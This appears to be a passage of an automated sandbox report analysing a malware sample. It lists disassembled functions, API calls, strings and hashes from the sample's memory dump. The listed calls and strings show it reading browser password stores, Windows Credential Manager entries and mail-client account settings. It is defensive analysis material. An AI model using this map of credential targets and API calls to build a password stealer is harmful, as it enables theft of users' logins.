                                                                                                                                                              • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                              • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                              • API String ID: 2003275452-3138536805
                                                                                                                                                              • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                                                              • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                                                              • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                                                              • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00444612
                                                                                                                                                                • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                              • strlen.MSVCRT ref: 0044462E
                                                                                                                                                              • memset.MSVCRT ref: 00444668
                                                                                                                                                              • memset.MSVCRT ref: 0044467C
                                                                                                                                                              • memset.MSVCRT ref: 00444690
                                                                                                                                                              • memset.MSVCRT ref: 004446B6
                                                                                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                              • String ID: salu
                                                                                                                                                              • API String ID: 3691931180-4177317985
                                                                                                                                                              • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                                                              • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                                                              • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                                                                              • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                              • API String ID: 2449869053-232097475
                                                                                                                                                              • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                              • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                                                              • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                                              • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                                                              APIs
                                                                                                                                                              • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                              • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                                • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                                • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                                • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                                • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                              • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                              • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                              • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                              • memset.MSVCRT ref: 0040961C
                                                                                                                                                              • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                              • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                              • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                              • API String ID: 3259144588-3822380221
                                                                                                                                                              • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                                                              • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                                                              • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                                                                              • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                              • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                              • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                              • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                              • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                              • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                              • API String ID: 2449869053-4258758744
                                                                                                                                                              • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                              • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                                                              • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                              • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                                                              APIs
                                                                                                                                                              • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                                              • strchr.MSVCRT ref: 004042F6
                                                                                                                                                              • strlen.MSVCRT ref: 0040430A
                                                                                                                                                              • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                              • strchr.MSVCRT ref: 0040433C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                              • String ID: %s@gmail.com$www.google.com
                                                                                                                                                              • API String ID: 3866421160-4070641962
                                                                                                                                                              • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                                                              • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                                                              • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                                                                              • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                                                              APIs
                                                                                                                                                              • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
                                                                                                                                                              • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
                                                                                                                                                                • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                                • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                                • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                              • EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
                                                                                                                                                              • EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
                                                                                                                                                              • _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
                                                                                                                                                              • memset.MSVCRT ref: 004097BD
                                                                                                                                                              • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
                                                                                                                                                                • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                              • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                              • API String ID: 1035899707-3647959541
                                                                                                                                                              • Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                                                                              • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                                                              • Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                                                                              • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                              • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                              • API String ID: 2360744853-2229823034
                                                                                                                                                              • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                                                              • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                                                              • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                                                              • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                                                              APIs
                                                                                                                                                              • strchr.MSVCRT ref: 004100E4
                                                                                                                                                              • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                              • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                              • memset.MSVCRT ref: 00410129
                                                                                                                                                                • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                                • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                              • memset.MSVCRT ref: 00410171
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                              • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                              • String ID: \systemroot
                                                                                                                                                              • API String ID: 912701516-1821301763
                                                                                                                                                              • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                                                              • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                                                              • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                                                              • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                              • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                              • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$strlen
                                                                                                                                                              • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                              • API String ID: 2619041689-3408036318
                                                                                                                                                              • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                              • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                                              • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                              • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                              • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                              • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                              • memset.MSVCRT ref: 0040882A
                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                              • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                              • String ID: J$Microsoft_WinInet
                                                                                                                                                              • API String ID: 3318079752-260894208
                                                                                                                                                              • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                                                              • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                                                              • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                                                              • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                              • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                                                                                              • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                                                                                              • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                                • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                              • API String ID: 888011440-2039793938
                                                                                                                                                              • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                                                              • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                                                              • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                                                              • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                              • strchr.MSVCRT ref: 0040327B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfileStringstrchr
                                                                                                                                                              • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                              • API String ID: 1348940319-1729847305
                                                                                                                                                              • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                              • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                                              • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                              • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                                              APIs
                                                                                                                                                              • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                              • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                              • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy
                                                                                                                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                              • API String ID: 3510742995-3273207271
